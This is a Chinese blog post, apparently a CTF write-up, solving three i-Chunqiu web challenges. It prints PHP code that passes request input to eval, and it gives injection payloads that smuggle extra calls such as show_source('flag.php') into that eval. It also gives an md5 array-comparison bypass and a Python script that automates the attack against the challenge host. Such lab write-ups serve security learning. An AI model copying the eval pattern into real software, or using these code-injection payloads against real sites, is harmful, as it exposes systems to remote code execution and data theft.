i-春秋选手训练营-web训练

最新推荐文章于 2024-03-26 11:08:16 发布
最新推荐文章于 2024-03-26 11:08:16 发布
阅读量406 收藏 2
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45871855/article/details/111401084
版权

10pt

“百度杯”CTF比赛 2017 二月场

Misc web 爆破-1

在这里插入图片描述

PHP一个比较有意思的变量!$GLOBALS:一个包含了全部变量的全局组合数组。变量的名字就是数组的键。

<?php include "flag.php"; //包含flag.php这个文件 
$a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值 
if(!preg_match('/^\w*$/',$a )){ //正则表达式,匹配字符串,\w表示字符+数字+下划线,*代表有若干个\w字符组成。 
  die('ERROR');//不匹配则输出ERROR } 
  eval("var_dump($$a);"); //如果匹配输出\$\$a的值 
  //var_dump()会返回数据变量的类型和值
  show_source(__FILE__);
 ?>

传 /?hello=GLOBALS

在这里插入图片描述得flag

Misc Web 爆破-2

在这里插入图片描述

var_dump()会返回数据变量的类型和值

eval()会把字符串当作php代码

<?php
include "flag.php";//包含flag.php这个文件
$a = @$_REQUEST['hello'];//$a这个变量请求变量hello的值 
eval( "var_dump($a);");//如果匹配输出$a的值
show_source(__FILE__);

方法一:传入:?hello=file(‘flag.php’)
在这里插入图片描述方法二:传 ?hello=);show_source(‘flag.php’);var_dump(
在这里插入图片描述得flag

Misc Web 爆破-3

<?php 
error_reporting(0);//规定报告哪个错误
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
  $_SESSION['nums'] = 0;
  $_SESSION['time'] = time();
  $_SESSION['whoami'] = 'ea';
}

if($_SESSION['time']+120<time()){
  session_destroy();
}

$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;
  $_SESSION['whoami'] = $str_rands;
  echo $str_rands;
}

if($_SESSION['nums']>=10){
  echo $flag;
}

show_source(__FILE__);
?>

一开始nums为0,接收的value变量,要满足value数组的前两个数和whoaimi变量相同并且md5加密后的value变量为0(这个可以用MD5无法处理数组的漏洞)

也就是第一次,传入变量?value[]=ea,因此value[0]=ea 与whoami想等,所以nums++ (如果value[]=ea&value=es的话,value[0].value[1]=eaes)

然后随意A-Z+A-Z,写个脚本,把显示出来的两个随机衣服在value[]=xx传值进去,直到输出flag
变量str_rand的值是2位小写字母
如果SESSIONS中的whoami参数和参数value的值相等,并且md5()函数处理后的变量value的第5位开始往后4位等于0,nums就会加1,whoami的值就也会更新,当nums大于10的话,就能得到flag了

数组可以绕过md5的这个判断,因为md5()函数处理一个数组会返回null,null==0

第一次传参,?value[]=ea

在这里插入图片描述python脚本跑一下

import requests
 
s = requests.session()
 
strs = ['abcdefghijklmnopqrstuvwxyz']
 
url = "http://44cf88a78da241249ca10151b2462cc4e2c1c96da6dc4c5a.changame.ichunqiu.com/?value[]=ea"
r = s.get(url)
 
for i in range(10):
    url_1 = "http://44cf88a78da241249ca10151b2462cc4e2c1c96da6dc4c5a.changame.ichunqiu.com/?value[]=" + r.text[:2]
    r = s.get(url_1)
    print(r.url)
    if 'flag{' in r.text:
        print(r.text)

在这里插入图片描述

得到flag

青山老茶树
关注
专栏目录
博图块接口定义常变量
RXXW_Dor的博客
12-27 2436
1、博图块接口定义:常变量 const定义的是变量不是常量,只是这个变量的值不允许改变是常变量!带有类型。编译运行的时候起作用存在类型检查。 define定义的是不带类型的常数,只进行简单的字符替换。在预编译的时候起作用,不存在类型检查。 2、两者区别: #define 宏是在预处理阶段展开。 const 常量是编译运行阶段使用。 ...
JavaScript-小白1
weixin_45026839的博客
09-30 256
一、初识 JavaScript 什么是 JavaScrpt ? js的作用是什么 ? HTML/CSS/JS 的关系 浏览器执行 JS 的简介 JS 的组成 JS 的三种书写位置 二、JavaScript 注释 单行注释 多行注释 三、JavaScript 输入输出语句四、变量概述 什么是变量 变量在内存中的存储 五、变量的使用 声明变量 赋值 变量的初始化 六、变量语法扩展 更新变量 同时声明多个变量 声明变量特殊情况 七、变量命
博途变量类型_PLC数据类型(UDT)
weixin_30884379的博客
12-23 1万+
UDT类型是一种由多个不同数据类型元素组成的数据结构,元素可以是基本数据类型,也可以是STRUCT、数组等复杂数据类型以及其它UDT等。UDT类型嵌套UDT类型的深度限制为 8 级。UDT类型可以在DB、OB/FC/FB接口区处使用。从TIA 博途 V13SP1 开始,S7-1200 V4.0开始,PLC变量表中的I和Q也可以使用UDT类型。UDT类型可在程序中统一更改和重复使用,一旦某UDT类型...
TIA博图中FB、FC块中的Input、Output、Inout、Static、Temp、Constant、Return的用法
whp097的博客
03-26 8810
TIA博图中的FB(Function Block)和FC(Function)块在工业自动化和控制系统中扮演着重要角色。它们用于实现特定的控制逻辑或功能,并在程序执行过程中进行数据的传递和处理。下面将详细解释FB和FC块中Input、Output、Inout、Static、Temp、Constant以及FC块中的Return的用法和区别。
int和Integer的区别
weixin_47279969的博客
11-09 259
int和Integer的区别 Integer是int的包装类,int是基本数据类型; Integer变量必须实例化后才能使用,int变量不需要; Integer实际是对象的引用,指向此new的Integer对象,int是直接存储数据值; Integer的默认是是null,int的默认值是0; 由于Integer变量实际是对一个Integer对象的引用,所以两个通过new生成的Integer变量永远不相等(因为new生成的是两个对象,其内存地址不同) Integer i=new Integ
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋杯等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想
最新发布
04-30
### Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想 #### 0x01 前言 在网络安全领域中,“自我跨站脚本攻击”(Self-XSS)通常被视为一个不起眼的安全问题。然而,在实际应用中,通过巧妙的设计和策略,Self-...
i春秋ctf训练营writeup-Recreators
bbszhenshuai的博客
05-20 991
Recreators 首先下载并解压,可以看到没有拓展名 直接winhex打开看看 由这里可以看出该文件应该是一个VMware虚拟磁盘镜像,那么修改拓展名那个,再用winhex打开。 可以看到,winhex是由对vmdk格式的解析的。 打开可以看到这些内容,带$的都是系统文件,肯定先看misc.mp4 保存出来,打开看看 recreator的ED。来到了隐写的部分 此时一般思路是使用binwalk之类的看看有没有附加的东西,或者直接拿16进制编辑器看看,我选择了后者,因为前面都是视屏内容,我们从后
i春秋ctf训练营writeup-手贱的A君
bbszhenshuai的博客
05-18 1607
导语 i春秋也是个学东西的好地方呀。 手贱的A君 关键词:数据库,md5,拿着这一串莽头去md5在线解密 果然不会那么简单的。 定睛一看,这md5好像是33位啊¿ 定睛两看,这怎么害有个l啊?众所周知md5的内容里只有0-9和abcdef呀? 删去l再解密,果然正确了。 md5 MD5算法的原理可简要的叙述为:MD5码以512位分组来处理输入的信息,且每一分组又被划分为16个32位子分组,经过了一系列的处理后,算法的输出由四个32位分组组成,将这四个32位分组级联后将生成一个128位散列值。 [6]
i春秋web-SQLi(过滤逗号的注入--join注入技巧)
Sea_Sand息禅
05-21 2345
逗号被过滤之下需要一些注入技巧,本文为其中一种,另一种参考https://blog.csdn.net/zz_Caleb/article/details/88933173。 题目是SQLi,应该是个注入的题,进来之后直接就是b68a89d1c4a097a9d8631b3ac45e8979.php,一般应该是index.php的,这里可能是有一个重定向,看一下页面源码: 于是访问了login.php...
西门子数据类型
10-29
西门子的数据类型 西门子的数据类型 西门子的数据类型
TIA博途中FB和FC块里的IN,Inout,Out的区别以及Static和Temp变量的用法.docx
06-17
TIA博途中FB和FC块里的IN,Inout,Out的区别以及Static和Temp变量的用法
py变量
weixin_42737164的博客
07-19 285
python变量 1.什么是变量             变:记录的状态可以变化     量:是衡量/记录现实生活中某种事物的特征和状态 2.为什么要用变量     是为了让计算机能够像人一样将一个事物的特征/状态记录下来(存到计算机内存中),方便以后提取出来使用      3、如何用变量 ''' # 一 定义变量的语法 # age=18 # 变量名:相当于一个门牌号,是访问到值的唯一方式 #...
巧用博途RETURN接口类型变量(FC)
RXXW_Dor的博客
05-03 3720
博途PLC的FB FC 子程序概念可以参看我的另一篇博文: PLC FC FB子程序函数学习笔记_RXXW_BOSS的博客-CSDN博客FC、 FB、 子程序,(甚至包括一些指令)这些称呼其实并没有本质区别,可以统称为函数,比如2元运算符ADD指令等,关于函数的基础知识,可以参看高级语言的函数章节,函数可以被定义为返回任何类型的值,和形式参数不同,返回类型不存在重写,函数的返回值是由将导致函数终止的return语句中的表达式所指定的,函数的返回值并不是左值,(返回的是指),因此函数调用无法出现.....
Python基础:定义变量
热门推荐
小孙的博客
09-26 4万+
1.1变量 Python中的数据类型: 概念: 整型:int 浮点型:float 布尔型:bool(boolean) 字节型:bytes 字符: char(Python中没有char类型) 字符串:string 列表: list 字典: dictionary 集合: set, collection ...
Python变量定义与使用
m0_70911440的博客
01-16 1057
总结起来,Python中的变量是用于存储和表示数据的名称,可以通过简单的赋值操作对变量进行创建和修改。希望本文能够帮助读者更好地理解Python中的变量的定义与使用,并在编写代码时正确地使用它们,提高代码的可读性和可维护性。在Python编程语言中,变量是一种非常重要的概念,它用于存储各种类型的数据,并且可以根据需要对这些数据进行修改和操作。在本文中,我们将深入探讨Python中变量的定义与使用,包括变量的声明、赋值、命名规则、作用域以及一些最佳实践。在Python中,声明变量并给变量赋值是非常简单的。
Python变量的定义和使用
qq_45780540的博客
05-17 264
变量的学习: 1.什么是变量呢? 变量是一段有名字的的连续存储的空间,我们可以通过定义变量来申请并命名这样的存储空间,并通过变量的名字来使用这段存储空间 变量是程序中临时存放数据的场所。 2.变量的定义的规则 变量名=数据,Python是一门强类型的语言 赋值变量时不需要指定数据类型 给这个变量赋值什么数据类型,这个变量就是什么类型。 python中可以利用type函数来查看当前的数据类型。 请看下面的例子 a=10 print(type(a)) #type--用来查看a的数据类型 a=..
Python中的变量:变量的定义、赋值等操作
改改的博客
07-13 3036
目录 一、知道什么是变量? 二、变量怎么定义呢? 三、如何访问变量呢? 四、变量的其他操作 1、变量赋值与修改 2、变量的删除 3、变量的类型 4、变量的命名规范 5、变量的作用域 6、变量的多重赋值
py_变量使用
BooGooMoo的博客
06-04 340
变量只能包含字母,数字,下划线,且不能以数字开头 massage#ture _massage#true 1massage#false 不能包含空格,一般用下划线来分割其中单词,例: new_massage 不要将关键字用于变量名 慎用小写字母1和大写字母O(容易看成0和1) 变量以引用方式赋值 a=100 b=a #此时a,b指向同一地址 默认数据类型: 函数默认多返回为:...
i春秋CVE-2022-32991
08-12
- *1* *2* *3* [【春秋云境】CVE-2022-32991靶场wp](https://blog.csdn.net/MONSTERinCAT/article/details/127261129)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值